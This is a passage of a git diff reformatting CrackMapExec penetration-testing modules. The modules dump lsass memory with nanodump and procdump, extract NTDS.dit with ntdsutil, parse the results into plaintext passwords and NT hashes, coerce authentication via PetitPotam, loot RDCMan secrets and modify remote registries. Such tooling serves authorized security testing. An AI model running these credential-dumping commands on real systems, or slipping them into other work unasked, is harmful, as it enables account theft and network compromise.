+113,13 @@ class CMEModule: return initial_user for grantor in user.grantors: if grantor.is_sysadmin: - self.context.log.success( - f"{user.username} can impersonate: " - f"{grantor.username} (sysadmin)" - ) + self.context.log.success(f"{user.username} can impersonate: " f"{grantor.username} (sysadmin)") return grantor elif grantor.dbowner: - self.context.log.success( - f"{user.username} can impersonate: {grantor.username} (which can privesc via dbowner)" - ) + self.context.log.success(f"{user.username} can impersonate: {grantor.username} (which can privesc via dbowner)") return grantor else: - self.context.log.display( - f"{user.username} can impersonate: {grantor.username}" - ) + self.context.log.display(f"{user.username} can impersonate: {grantor.username}") return self.browse_path(context, initial_user, grantor) def query_and_get_output(self, query): @@ -194,9 +182,7 @@ class CMEModule: return False def get_databases(self, exec_as="") -> list: - res = self.query_and_get_output( - exec_as + "SELECT name FROM master..sysdatabases" - ) + res = self.query_and_get_output(exec_as + "SELECT name FROM master..sysdatabases") self.revert_context(exec_as) self.context.log.debug(f"Response: {res}") self.context.log.debug(f"Response Type: {type(res)}") @@ -290,15 +276,11 @@ class CMEModule: return users def remove_sysadmin_priv(self) -> bool: - res = self.query_and_get_output( - f"EXEC sp_dropsrvrolemember '{self.current_username}', 'sysadmin'" - ) + res = self.query_and_get_output(f"EXEC sp_dropsrvrolemember '{self.current_username}', 'sysadmin'") return not self.is_admin() def is_admin_user(self, username) -> bool: - res = self.query_and_get_output( - f"SELECT IS_SRVROLEMEMBER('sysadmin', '{username}')" - ) + res = self.query_and_get_output(f"SELECT IS_SRVROLEMEMBER('sysadmin', '{username}')") try: if int(res): self.admin_privs = True diff --git a/cme/modules/nanodump.py b/cme/modules/nanodump.py index 59e31377..5b39589d 100644 --- a/cme/modules/nanodump.py +++ b/cme/modules/nanodump.py @@ -100,16 +100,10 @@ class CMEModule: if self.context.protocol == "smb": with open(self.nano_path + self.nano, "rb") as nano: try: - self.connection.conn.putFile( - self.share, self.tmp_share + self.nano, nano.read - ) - self.context.log.success( - f"Created file {self.nano} on the \\\\{self.share}{self.tmp_share}" - ) + self.connection.conn.putFile(self.share, self.tmp_share + self.nano, nano.read) + self.context.log.success(f"Created file {self.nano} on the \\\\{self.share}{self.tmp_share}") except Exception as e: - self.context.log.fail( - f"Error writing file to share {self.share}: {e}" - ) + self.context.log.fail(f"Error writing file to share {self.share}: {e}") else: with open(self.nano_path + self.nano, "rb") as nano: try: @@ -117,18 +111,12 @@ class CMEModule: exec_method = MSSQLEXEC(self.connection.conn) exec_method.put_file(nano.read(), self.tmp_dir + self.nano) if exec_method.file_exists(self.tmp_dir + self.nano): - self.context.log.success( - f"Created file {self.nano} on the remote machine {self.tmp_dir}" - ) + self.context.log.success(f"Created file {self.nano} on the remote machine {self.tmp_dir}") else: - self.context.log.fail( - "File does not exist on the remote system... error during upload" - ) + self.context.log.fail("File does not exist on the remote system... error during upload") sys.exit(1) except Exception as e: - self.context.log.fail( - f"Error writing file to remote machine directory {self.tmp_dir}: {e}" - ) + self.context.log.fail(f"Error writing file to remote machine directory {self.tmp_dir}: {e}") # apparently SMB exec methods treat the output parameter differently than MSSQL (we use it to display()) # if we don't do this, then SMB doesn't actually return the results of commands, so it appears that the @@ -178,45 +166,27 @@ class CMEModule: if self.context.protocol == "smb": with open(filename, "wb+") as dump_file: try: - self.connection.conn.getFile( - self.share, self.tmp_share + nano_log_name, dump_file.write - ) - self.context.log.success( - f"Dumpfile of lsass.exe was transferred to {filename}" - ) + self.connection.conn.getFile(self.share, self.tmp_share + nano_log_name, dump_file.write) + self.context.log.success(f"Dumpfile of lsass.exe was transferred to {filename}") except Exception as e: self.context.log.fail(f"Error while getting file: {e}") try: - self.connection.conn.deleteFile( - self.share, self.tmp_share + self.nano - ) - self.context.log.success( - f"Deleted nano file on the {self.share} share" - ) + self.connection.conn.deleteFile(self.share, self.tmp_share + self.nano) + self.context.log.success(f"Deleted nano file on the {self.share} share") except Exception as e: - self.context.log.fail( - f"Error deleting nano file on share {self.share}: {e}" - ) + self.context.log.fail(f"Error deleting nano file on share {self.share}: {e}") try: - self.connection.conn.deleteFile( - self.share, self.tmp_share + nano_log_name - ) - self.context.log.success( - f"Deleted lsass.dmp file on the {self.share} share" - ) + self.connection.conn.deleteFile(self.share, self.tmp_share + nano_log_name) + self.context.log.success(f"Deleted lsass.dmp file on the {self.share} share") except Exception as e: - self.context.log.fail( - f"Error deleting lsass.dmp file on share {self.share}: {e}" - ) + self.context.log.fail(f"Error deleting lsass.dmp file on share {self.share}: {e}") else: try: exec_method = MSSQLEXEC(self.connection.conn) exec_method.get_file(self.tmp_dir + nano_log_name, filename) - self.context.log.success( - f"Dumpfile of lsass.exe was transferred to {filename}" - ) + self.context.log.success(f"Dumpfile of lsass.exe was transferred to {filename}") except Exception as e: self.context.log.fail(f"Error while getting file: {e}") @@ -224,13 +194,9 @@ class CMEModule: try: self.connection.execute(f"del {self.tmp_dir + nano_log_name}") - self.context.log.success( - f"Deleted lsass.dmp file on the {self.tmp_dir} dir" - ) + self.context.log.success(f"Deleted lsass.dmp file on the {self.tmp_dir} dir") except Exception as e: - self.context.log.fail( - f"[OPSEC] Error deleting lsass.dmp file on dir {self.tmp_dir}: {e}" - ) + self.context.log.fail(f"[OPSEC] Error deleting lsass.dmp file on dir {self.tmp_dir}: {e}") fh = open(filename, "r+b") fh.seek(0) @@ -262,32 +228,22 @@ class CMEModule: for luid in pypy_parse.logon_sessions: for ssp in ssps: - for cred in getattr( - pypy_parse.logon_sessions[luid], ssp, [] - ): + for cred in getattr(pypy_parse.logon_sessions[luid], ssp, []): domain = getattr(cred, "domainname", None) username = getattr(cred, "username", None) password = getattr(cred, "password", None) NThash = getattr(cred, "NThash", None) if NThash is not None: NThash = NThash.hex() - if ( - username - and (password or NThash) - and "$" not in username - ): + if username and (password or NThash) and "$" not in username: if password: credtype = "password" credential = password else: credtype = "hash" credential = NThash - self.context.log.highlight( - f"{domain}\\{username}:{credential}" - ) - host_id = self.context.db.get_hosts( - self.connection.host - )[0][0] + self.context.log.highlight(f"{domain}\\{username}:{credential}") + host_id = self.context.db.get_hosts(self.connection.host)[0][0] self.context.db.add_credential( credtype, connection.domain, @@ -295,11 +251,7 @@ class CMEModule: credential, pillaged_from=host_id, ) - if ( - "." not in domain - and domain.upper() - in self.connection.domain.upper() - ): + if "." not in domain and domain.upper() in self.connection.domain.upper(): domain = self.connection.domain bh_creds.append( { @@ -308,9 +260,7 @@ class CMEModule: } ) if len(bh_creds) > 0: - add_user_bh( - bh_creds, None, self.context.log, self.connection.config - ) + add_user_bh(bh_creds, None, self.context.log, self.connection.config) except Exception as e: self.context.log.fail(f"Error opening dump file: {e}") @@ -319,6 +269,4 @@ class CMEModule: self.connection.execute(f"del {self.tmp_dir + self.nano}") self.context.log.success(f"Deleted nano file on the {self.share} dir") except Exception as e: - self.context.log.fail( - f"[OPSEC] Error deleting nano file on dir {self.tmp_dir}: {e}" - ) + self.context.log.fail(f"[OPSEC] Error deleting nano file on dir {self.tmp_dir}: {e}") diff --git a/cme/modules/nopac.py b/cme/modules/nopac.py index 06efd58e..d3c81d2c 100644 --- a/cme/modules/nopac.py +++ b/cme/modules/nopac.py @@ -21,9 +21,7 @@ class CMEModule: """ """ def on_login(self, context, connection): - user_name = Principal( - connection.username, type=constants.PrincipalNameType.NT_PRINCIPAL.value - ) + user_name = Principal(connection.username, type=constants.PrincipalNameType.NT_PRINCIPAL.value) try: tgt_with_pac, cipher, old_session_key, session_key = getKerberosTGT( user_name, @@ -52,6 +50,4 @@ class CMEModule: context.log.highlight("VULNERABLE") context.log.highlight("Next step: https://github.com/Ridter/noPac") except OSError as e: - context.log.debug( - f"Error connecting to Kerberos (port 88) on {connection.host}" - ) + context.log.debug(f"Error connecting to Kerberos (port 88) on {connection.host}") diff --git a/cme/modules/ntdsutil.py b/cme/modules/ntdsutil.py index b4fa2e80..b3979435 100644 --- a/cme/modules/ntdsutil.py +++ b/cme/modules/ntdsutil.py @@ -41,24 +41,14 @@ class CMEModule: self.no_delete = True def on_admin_login(self, context, connection): - command = ( - "powershell \"ntdsutil.exe 'ac i ntds' 'ifm' 'create full %s%s' q q\"" - % (self.tmp_dir, self.dump_location) - ) - context.log.display( - "Dumping ntds with ntdsutil.exe to %s%s" - % (self.tmp_dir, self.dump_location) - ) - context.log.highlight( - "Dumping the NTDS, this could take a while so go grab a redbull..." - ) + command = "powershell \"ntdsutil.exe 'ac i ntds' 'ifm' 'create full %s%s' q q\"" % (self.tmp_dir, self.dump_location) + context.log.display("Dumping ntds with ntdsutil.exe to %s%s" % (self.tmp_dir, self.dump_location)) + context.log.highlight("Dumping the NTDS, this could take a while so go grab a redbull...") context.log.debug("Executing command {}".format(command)) p = connection.execute(command, True) context.log.debug(p) if "success" in p: - context.log.success( - "NTDS.dit dumped to %s%s" % (self.tmp_dir, self.dump_location) - ) + context.log.success("NTDS.dit dumped to %s%s" % (self.tmp_dir, self.dump_location)) else: context.log.fail("Error while dumping NTDS") return @@ -69,16 +59,11 @@ class CMEModule: context.log.display("Copying NTDS dump to %s" % self.dir_result) context.log.debug("Copy ntds.dit to host") - with open( - os.path.join(self.dir_result, "Active Directory", "ntds.dit"), "wb+" - ) as dump_file: + with open(os.path.join(self.dir_result, "Active Directory", "ntds.dit"), "wb+") as dump_file: try: connection.conn.getFile( self.share, - self.tmp_share - + self.dump_location - + "\\" - + "Active Directory\\ntds.dit", + self.tmp_share + self.dump_location + "\\" + "Active Directory\\ntds.dit", dump_file.write, ) context.log.debug("Copied ntds.dit file") @@ -86,9 +71,7 @@ class CMEModule: context.log.fail("Error while get ntds.dit file: {}".format(e)) context.log.debug("Copy SYSTEM to host") - with open( - os.path.join(self.dir_result, "registry", "SYSTEM"), "wb+" - ) as dump_file: + with open(os.path.join(self.dir_result, "registry", "SYSTEM"), "wb+") as dump_file: try: connection.conn.getFile( self.share, @@ -100,9 +83,7 @@ class CMEModule: context.log.fail("Error while get SYSTEM file: {}".format(e)) context.log.debug("Copy SECURITY to host") - with open( - os.path.join(self.dir_result, "registry", "SECURITY"), "wb+" - ) as dump_file: + with open(os.path.join(self.dir_result, "registry", "SECURITY"), "wb+") as dump_file: try: connection.conn.getFile( self.share, @@ -116,16 +97,9 @@ class CMEModule: try: command = "rmdir /s /q %s%s" % (self.tmp_dir, self.dump_location) p = connection.execute(command, True) - context.log.success( - "Deleted %s%s remote dump directory" - % (self.tmp_dir, self.dump_location) - ) + context.log.success("Deleted %s%s remote dump directory" % (self.tmp_dir, self.dump_location)) except Exception as e: - context.log.fail( - "Error deleting {} remote directory on share {}: {}".format( - self.dump_location, self.share, e - ) - ) + context.log.fail("Error deleting {} remote directory on share {}: {}".format(self.dump_location, self.share, e)) localOperations = LocalOperations("%s/registry/SYSTEM" % self.dir_result) bootKey = localOperations.getBootKey() @@ -153,16 +127,12 @@ class CMEModule: username, _, lmhash, nthash, _, _, _ = hash.split(":") parsed_hash = ":".join((lmhash, nthash)) if validate_ntlm(parsed_hash): - context.db.add_credential( - "hash", domain, username, parsed_hash, pillaged_from=host_id - ) + context.db.add_credential("hash", domain, username, parsed_hash, pillaged_from=host_id) add_ntds_hash.added_to_db += 1 return raise except: - context.log.debug( - "Dumped hash is not NTLM, not adding to db for now ;)" - ) + context.log.debug("Dumped hash is not NTLM, not adding to db for now ;)") else: context.log.debug("Dumped hash is a computer account, not adding to db") @@ -187,9 +157,7 @@ class CMEModule: ) try: - context.log.success( - "Dumping the NTDS, this could take a while so go grab a redbull..." - ) + context.log.success("Dumping the NTDS, this could take a while so go grab a redbull...") NTDS.dump() context.log.success( "Dumped {} NTDS hashes to {} of which {} were added to the database".format( @@ -198,26 +166,15 @@ class CMEModule: highlight(add_ntds_hash.added_to_db), ) ) - context.log.display( - "To extract only enabled accounts from the output file, run the following command: " - ) - context.log.display( - "grep -iv disabled {} | cut -d ':' -f1".format( - connection.output_filename + ".ntds" - ) - ) + context.log.display("To extract only enabled accounts from the output file, run the following command: ") + context.log.display("grep -iv disabled {} | cut -d ':' -f1".format(connection.output_filename + ".ntds")) except Exception as e: context.log.fail(e) NTDS.finish() if self.no_delete: - context.log.display( - "Raw NTDS dump copied to %s, parse it with:" % self.dir_result - ) - context.log.display( - 'secretsdump.py -system %s/registry/SYSTEM -security %s/registry/SECURITY -ntds "%s/Active Directory/ntds.dit" LOCAL' - % (self.dir_result, self.dir_result, self.dir_result) - ) + context.log.display("Raw NTDS dump copied to %s, parse it with:" % self.dir_result) + context.log.display('secretsdump.py -system %s/registry/SYSTEM -security %s/registry/SECURITY -ntds "%s/Active Directory/ntds.dit" LOCAL' % (self.dir_result, self.dir_result, self.dir_result)) else: shutil.rmtree(self.dir_result) diff --git a/cme/modules/ntlmv1.py b/cme/modules/ntlmv1.py index 41b2cccd..98481a49 100644 --- a/cme/modules/ntlmv1.py +++ b/cme/modules/ntlmv1.py @@ -44,14 +44,10 @@ class CMEModule: "lmcompatibilitylevel\x00", ) except rrp.DCERPCSessionError as e: - context.log.debug( - f"Unable to reference lmcompatabilitylevel, which probably means ntlmv1 is not set" - ) + context.log.debug(f"Unable to reference lmcompatabilitylevel, which probably means ntlmv1 is not set") if rtype and data and int(data) in [0, 1, 2]: - context.log.highlight( - self.output.format(connection.conn.getRemoteHost(), data) - ) + context.log.highlight(self.output.format(connection.conn.getRemoteHost(), data)) except DCERPCSessionError as e: context.log.debug(f"Error connecting to RemoteRegistry: {e}") finally: diff --git a/cme/modules/output-test.py b/cme/modules/output-test.py new file mode 100644 index 00000000..df2612ae --- /dev/null +++ b/cme/modules/output-test.py @@ -0,0 +1,33 @@ +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- + + +class CMEModule: + name = "test" + description = "I do something" + supported_protocols = ["smb"] + opsec_safe = True # Does the module touch disk? + multiple_hosts = True # Does it make sense to run this module on multiple hosts at a time? + + def __init__(self, context=None, module_options=None): + self.context = context + self.module_options = module_options + + def options(self, context, module_options): + """Required. + Module options get parsed here. Additionally, put the modules usage here as well + """ + pass + + def on_admin_login(self, context, connection): + """Concurrent. + Required if on_login is not present + This gets called on each authenticated connection with Administrative privileges + """ + context.log.info("info") + context.log.display("display") + context.log.success("success") + context.log.highlight("highlight") + context.log.fail("error test") + context.log.fail("fail test") + context.log.debug("debug") diff --git a/cme/modules/petitpotam.py b/cme/modules/petitpotam.py index 70841215..49b4115d 100644 --- a/cme/modules/petitpotam.py +++ b/cme/modules/petitpotam.py @@ -21,9 +21,7 @@ from impacket.uuid import uuidtup_to_bin class CMEModule: name = "petitpotam" - description = ( - "Module to check if the DC is vulnerable to PetitPotam, credit to @topotam" - ) + description = "Module to check if the DC is vulnerable to PetitPotam, credit to @topotam" supported_protocols = ["smb"] opsec_safe = True multiple_hosts = True @@ -47,9 +45,7 @@ class CMEModule: domain=connection.domain, lmhash=connection.lmhash, nthash=connection.nthash, - target=connection.host - if not connection.kerberos - else connection.hostname + "." + connection.domain, + target=connection.host if not connection.kerberos else connection.hostname + "." + connection.domain, pipe=self.pipe, do_kerberos=connection.kerberos, dc_host=connection.kdcHost, @@ -228,9 +224,7 @@ def coerce( "MSRPC_UUID_EFSR": ("c681d488-d850-11d0-8c52-00c04fd90f7e", "1.0"), }, } - rpc_transport = transport.DCERPCTransportFactory( - binding_params[pipe]["stringBinding"] - ) + rpc_transport = transport.DCERPCTransportFactory(binding_params[pipe]["stringBinding"]) if hasattr(rpc_transport, "set_credentials"): rpc_transport.set_credentials( username=username, @@ -281,9 +275,7 @@ def efs_rpc_open_file_raw(dce, listener, context=None): context.log.info("[+] Attack worked!") return True if str(e).find("rpc_s_access_denied") >= 0: - context.log.info( - "[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!" - ) + context.log.info("[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!") context.log.info("[+] OK! Using unpatched function!") context.log.info("[-] Sending EfsRpcEncryptFileSrv!") try: @@ -296,8 +288,6 @@ def efs_rpc_open_file_raw(dce, listener, context=None): context.log.info("[+] Attack worked!") return True else: - context.log.debug( - "Something went wrong, check error status => %s" % str(e) - ) + context.log.debug("Something went wrong, check error status => %s" % str(e)) else: context.log.debug("Something went wrong, check error status => %s" % str(e)) diff --git a/cme/modules/printnightmare.py b/cme/modules/printnightmare.py index 2861cbc4..98f069b5 100644 --- a/cme/modules/printnightmare.py +++ b/cme/modules/printnightmare.py @@ -102,14 +102,10 @@ class CMEModule: return False # If vulnerable, 'ERROR_INVALID_PARAMETER' will be returned if e.error_code == system_errors.ERROR_INVALID_PARAMETER: - context.log.highlight( - "Vulnerable, next step https://github.com/ly4k/PrintNightmare" - ) + context.log.highlight("Vulnerable, next step https://github.com/ly4k/PrintNightmare") return True raise e - context.log.highlight( - "Vulnerable, next step https://github.com/ly4k/PrintNightmare" - ) + context.log.highlight("Vulnerable, next step https://github.com/ly4k/PrintNightmare") return True @@ -198,18 +194,10 @@ class DRIVER_INFO_2_BLOB(Structure): name_len = name.find("\0") self["Name"] = checkNullString(name[:name_len]) - self["ConfigFile"] = data[ - self["ConfigFileOffset"] + offset : self["DataFileOffset"] + offset - ].decode("utf-16-le") - self["DataFile"] = data[ - self["DataFileOffset"] + offset : self["DriverPathOffset"] + offset - ].decode("utf-16-le") - self["DriverPath"] = data[ - self["DriverPathOffset"] + offset : self["EnvironmentOffset"] + offset - ].decode("utf-16-le") - self["Environment"] = data[ - self["EnvironmentOffset"] + offset : self["NameOffset"] + offset - ].decode("utf-16-le") + self["ConfigFile"] = data[self["ConfigFileOffset"] + offset : self["DataFileOffset"] + offset].decode("utf-16-le") + self["DataFile"] = data[self["DataFileOffset"] + offset : self["DriverPathOffset"] + offset].decode("utf-16-le") + self["DriverPath"] = data[self["DriverPathOffset"] + offset : self["EnvironmentOffset"] + offset].decode("utf-16-le") + self["Environment"] = data[self["EnvironmentOffset"] + offset : self["NameOffset"] + offset].decode("utf-16-le") class DRIVER_INFO_2_ARRAY(Structure): diff --git a/cme/modules/procdump.py b/cme/modules/procdump.py index 9bdb2612..246f9790 100644 --- a/cme/modules/procdump.py +++ b/cme/modules/procdump.py @@ -59,19 +59,11 @@ class CMEModule: with open(self.procdump_path + self.procdump, "wb") as procdump: procdump.write(self.procdump_embeded) - context.log.display( - "Copy {} to {}".format(self.procdump_path + self.procdump, self.tmp_dir) - ) + context.log.display("Copy {} to {}".format(self.procdump_path + self.procdump, self.tmp_dir)) with open(self.procdump_path + self.procdump, "rb") as procdump: try: - connection.conn.putFile( - self.share, self.tmp_share + self.procdump, procdump.read - ) - context.log.success( - "Created file {} on the \\\\{}{}".format( - self.procdump, self.share, self.tmp_share - ) - ) + connection.conn.putFile(self.share, self.tmp_share + self.procdump, procdump.read) + context.log.success("Created file {} on the \\\\{}{}".format(self.procdump, self.share, self.tmp_share)) except Exception as e: context.log.fail(f"Error writing file to share {self.share}: {e}") @@ -80,15 +72,7 @@ class CMEModule: context.log.display("Getting lsass PID {}".format(command)) p = connection.execute(command, True) pid = p.split(",")[1][1:-1] - command = ( - self.tmp_dir - + self.procdump - + " -accepteula -ma " - + pid - + " " - + self.tmp_dir - + "%COMPUTERNAME%-%PROCESSOR_ARCHITECTURE%-%USERDOMAIN%.dmp" - ) + command = self.tmp_dir + self.procdump + " -accepteula -ma " + pid + " " + self.tmp_dir + "%COMPUTERNAME%-%PROCESSOR_ARCHITECTURE%-%USERDOMAIN%.dmp" context.log.display("Executing command {}".format(command)) p = connection.execute(command, True) context.log.debug(p) @@ -113,38 +97,22 @@ class CMEModule: with open(self.dir_result + machine_name, "wb+") as dump_file: try: - connection.conn.getFile( - self.share, self.tmp_share + machine_name, dump_file.write - ) - context.log.success( - "Dumpfile of lsass.exe was transferred to {}".format( - self.dir_result + machine_name - ) - ) + connection.conn.getFile(self.share, self.tmp_share + machine_name, dump_file.write) + context.log.success("Dumpfile of lsass.exe was transferred to {}".format(self.dir_result + machine_name)) except Exception as e: context.log.fail("Error while get file: {}".format(e)) try: connection.conn.deleteFile(self.share, self.tmp_share + self.procdump) - context.log.success( - "Deleted procdump file on the {} share".format(self.share) - ) + context.log.success("Deleted procdump file on the {} share".format(self.share)) except Exception as e: - context.log.fail( - "Error deleting procdump file on share {}: {}".format(self.share, e) - ) + context.log.fail("Error deleting procdump file on share {}: {}".format(self.share, e)) try: connection.conn.deleteFile(self.share, self.tmp_share + machine_name) - context.log.success( - "Deleted lsass.dmp file on the {} share".format(self.share) - ) + context.log.success("Deleted lsass.dmp file on the {} share".format(self.share)) except Exception as e: - context.log.fail( - "Error deleting lsass.dmp file on share {}: {}".format( - self.share, e - ) - ) + context.log.fail("Error deleting lsass.dmp file on share {}: {}".format(self.share, e)) with open(self.dir_result + machine_name, "rb") as dump: try: @@ -167,28 +135,17 @@ class CMEModule: ] for luid in pypy_parse.logon_sessions: for ssp in ssps: - for cred in getattr( - pypy_parse.logon_sessions[luid], ssp, [] - ): + for cred in getattr(pypy_parse.logon_sessions[luid], ssp, []): domain = getattr(cred, "domainname", None) username = getattr(cred, "username", None) password = getattr(cred, "password", None) NThash = getattr(cred, "NThash", None) if NThash is not None: NThash = NThash.hex() - if ( - username - and (password or NThash) - and "$" not in username - ): + if username and (password or NThash) and "$" not in username: print_pass = password if password else NThash - context.log.highlight( - domain + "\\" + username + ":" + print_pass - ) - if ( - "." not in domain - and domain.upper() in connection.domain.upper() - ): + context.log.highlight(domain + "\\" + username + ":" + print_pass) + if "." not in domain and domain.upper() in connection.domain.upper(): domain = connection.domain credz_bh.append( { diff --git a/cme/modules/rdcman.py b/cme/modules/rdcman.py index 08763bfa..ccc2d44a 100644 --- a/cme/modules/rdcman.py +++ b/cme/modules/rdcman.py @@ -12,9 +12,7 @@ from cme.helpers.logger import highlight class CMEModule: name = "rdcman" - description = ( - "Remotely dump Remote Desktop Connection Manager (sysinternals) credentials" - ) + description = "Remotely dump Remote Desktop Connection Manager (sysinternals) credentials" supported_protocols = ["smb"] opsec_safe = True multiple_hosts = True @@ -64,9 +62,7 @@ class CMEModule: dc_conn.connect() if dc_conn.is_admin: - context.log.success( - "User is Domain Administrator, exporting domain backupkey..." - ) + context.log.success("User is Domain Administrator, exporting domain backupkey...") backupkey_triage = BackupkeyTriage(target=dc, conn=dc_conn) backupkey = backupkey_triage.triage_backupkey() self.pvkbytes = backupkey.backupkey_v2 @@ -96,16 +92,8 @@ class CMEModule: context.log.debug("Could not upgrade connection: {}".format(e)) return - plaintexts = { - username: password - for _, _, username, password, _, _ in context.db.get_credentials( - cred_type="plaintext" - ) - } - nthashes = { - username: nt.split(":")[1] if ":" in nt else nt - for _, _, username, nt, _, _ in context.db.get_credentials(cred_type="hash") - } + plaintexts = {username: password for _, _, username, password, _, _ in context.db.get_credentials(cred_type="plaintext")} + nthashes = {username: nt.split(":")[1] if ":" in nt else nt for _, _, username, nt, _, _ in context.db.get_credentials(cred_type="hash")} if password != "": plaintexts[username] = password if nthash != "": @@ -128,11 +116,7 @@ class CMEModule: context.log.fail("No masterkeys looted") return - context.log.success( - "Got {} decrypted masterkeys. Looting RDCMan secrets".format( - highlight(len(self.masterkeys)) - ) - ) + context.log.success("Got {} decrypted masterkeys. Looting RDCMan secrets".format(highlight(len(self.masterkeys)))) try: triage = RDGTriage(target=target, conn=conn, masterkeys=self.masterkeys) diff --git a/cme/modules/rdp.py b/cme/modules/rdp.py index b60e21eb..91f12183 100644 --- a/cme/modules/rdp.py +++ b/cme/modules/rdp.py @@ -62,9 +62,7 @@ class CMEModule: 0, ) - rtype, data = rrp.hBaseRegQueryValue( - remoteOps._RemoteOperations__rrp, keyHandle, "fDenyTSConnections\x00" - ) + rtype, data = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, "fDenyTSConnections\x00") if int(data) == 0: context.log.success("RDP enabled successfully") @@ -97,9 +95,7 @@ class CMEModule: 1, ) - rtype, data = rrp.hBaseRegQueryValue( - remoteOps._RemoteOperations__rrp, keyHandle, "fDenyTSConnections\x00" - ) + rtype, data = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, "fDenyTSConnections\x00") if int(data) == 1: context.log.success("RDP disabled successfully") diff --git a/cme/modules/reg-query.py b/cme/modules/reg-query.py index b6ed6017..cb754906 100644 --- a/cme/modules/reg-query.py +++ b/cme/modules/reg-query.py @@ -64,25 +64,17 @@ class CMEModule: try: self.value = int(self.value) except: - context.log.fail( - f"Invalid registry value type specified: {self.value}" - ) + context.log.fail(f"Invalid registry value type specified: {self.value}") return if self.type in type_dict: self.type = type_dict[self.type] else: - context.log.fail( - f"Invalid registry value type specified: {self.type}" - ) + context.log.fail(f"Invalid registry value type specified: {self.type}") return else: self.type = 1 - if ( - module_options - and "DELETE" in module_options - and module_options["DELETE"].lower() == "true" - ): + if module_options and "DELETE" in module_options and module_options["DELETE"].lower() == "true": self.delete = True def on_admin_login(self, context, connection): @@ -108,46 +100,32 @@ class CMEModule: self.path = self.path.replace("HKCR\\", "") ans = rrp.hOpenClassesRoot(remote_ops._RemoteOperations__rrp) else: - self.context.log.fail( - f"Unsupported registry hive specified in path: {self.path}" - ) + self.context.log.fail(f"Unsupported registry hive specified in path: {self.path}") return reg_handle = ans["phKey"] - ans = rrp.hBaseRegOpenKey( - remote_ops._RemoteOperations__rrp, reg_handle, self.path - ) + ans = rrp.hBaseRegOpenKey(remote_ops._RemoteOperations__rrp, reg_handle, self.path) key_handle = ans["phkResult"] if self.delete: # Delete registry try: # Check if value exists - data_type, reg_value = rrp.hBaseRegQueryValue( - remote_ops._RemoteOperations__rrp, key_handle, self.key - ) + data_type, reg_value = rrp.hBaseRegQueryValue(remote_ops._RemoteOperations__rrp, key_handle, self.key) except: self.context.log.fail(f"Registry key {self.key} does not exist") return # Delete value - rrp.hBaseRegDeleteValue( - remote_ops._RemoteOperations__rrp, key_handle, self.key - ) - self.context.log.success( - f"Registry key {self.key} has been deleted successfully" - ) + rrp.hBaseRegDeleteValue(remote_ops._RemoteOperations__rrp, key_handle, self.key) + self.context.log.success(f"Registry key {self.key} has been deleted successfully") rrp.hBaseRegCloseKey(remote_ops._RemoteOperations__rrp, key_handle) if self.value is not None: # Check if value exists try: # Check if value exists - data_type, reg_value = rrp.hBaseRegQueryValue( - remote_ops._RemoteOperations__rrp, key_handle, self.key - ) - self.context.log.highlight( - f"Key {self.key} exists with value {reg_value}" - ) + data_type, reg_value = rrp.hBaseRegQueryValue(remote_ops._RemoteOperations__rrp, key_handle, self.key) + self.context.log.highlight(f"Key {self.key} exists with value {reg_value}") # Modification rrp.hBaseRegSetValue( remote_ops._RemoteOperations__rrp, @@ -156,9 +134,7 @@ class CMEModule: self.type, self.value, ) - self.context.log.success( - f"Key {self.key} has been modified to {self.value}" - ) + self.context.log.success(f"Key {self.key} has been modified to {self.value}") except: rrp.hBaseRegSetValue( remote_ops._RemoteOperations__rrp, @@ -167,16 +143,12 @@ class CMEModule: self.type, self.value, ) - self.context.log.success( - f"New Key {self.key} has been added with value {self.value}" - ) + self.context.log.success(f"New Key {self.key} has been added with value {self.value}") rrp.hBaseRegCloseKey(remote_ops._RemoteOperations__rrp, key_handle) else: # Query try: - data_type, reg_value = rrp.hBaseRegQueryValue( - remote_ops._RemoteOperations__rrp, key_handle, self.key - ) + data_type, reg_value = rrp.hBaseRegQueryValue(remote_ops._RemoteOperations__rrp, key_handle, self.key) self.context.log.highlight(f"{self.key}: {reg_value}") except: if self.delete: @@ -186,9 +158,7 @@ class CMEModule: return rrp.hBaseRegCloseKey(remote_ops._RemoteOperations__rrp, key_handle) except DCERPCException as e: - self.context.log.fail( - f"DCERPC Error while querying or modifying registry: {e}" - ) + self.context.log.fail(f"DCERPC Error while querying or modifying registry: {e}") except Exception as e: self.context.log.fail(f"Error while querying or modifying registry: {e}") finally: diff --git a/cme/modules/scan-network.py b/cme/modules/scan-network.py index 426c32df..313ff1dd 100644 --- a/cme/modules/scan-network.py +++ b/cme/modules/scan-network.py @@ -16,9 +16,7 @@ from ldap3 import LEVEL def get_dns_zones(connection, root, debug=False): - connection.search( - root, "(objectClass=dnsZone)", search_scope=LEVEL, attributes=["dc"] - ) + connection.search(root, "(objectClass=dnsZone)", search_scope=LEVEL, attributes=["dc"]) zones = [] for entry in connection.response: if entry["type"] != "searchResEntry": @@ -40,11 +38,7 @@ def get_dns_resolver(server, context): socket.inet_aton(server) dnsresolver.nameservers = [server] except socket.error: - context.info( - "Using System DNS to resolve unknown entries. Make sure resolving your" - " target domain works here or specify an IP as target host to use that" - " server for queries" - ) + context.info("Using System DNS to resolve unknown entries. Make sure resolving your" " target domain works here or specify an IP as target host to use that" " server for queries") return dnsresolver @@ -114,10 +108,7 @@ class CMEModule: else: print("Could not parse ONLY_HOSTS option.") if module_options and "ONLY_HOSTS" in module_options: - if ( - module_options["ONLY_HOSTS"].lower() == "true" - or module_options["ONLY_HOSTS"] == "1" - ): + if module_options["ONLY_HOSTS"].lower() == "true" or module_options["ONLY_HOSTS"] == "1": self.showhosts = True else: print("Could not parse ONLY_HOSTS option.") @@ -138,10 +129,7 @@ class CMEModule: ) except ldap.LDAPSearchError as e: if e.getErrorString().find("sizeLimitExceeded") >= 0: - context.log.debug( - "sizeLimitExceeded exception caught, giving up and processing the" - " data received" - ) + context.log.debug("sizeLimitExceeded exception caught, giving up and processing the" " data received") # We reached the sizeLimit, process the answers we have already and that's it. Until we implement # paged queries list_sites = e.getAnswers() @@ -165,10 +153,7 @@ class CMEModule: if RECORD_TYPE_MAPPING[dr["Type"]] == "A": if dr["Type"] == 1: address = DNS_RPC_RECORD_A(dr["Data"]) - if ( - str(recordname) != "DomainDnsZones" - and str(recordname) != "ForestDnsZones" - ): + if str(recordname) != "DomainDnsZones" and str(recordname) != "ForestDnsZones": 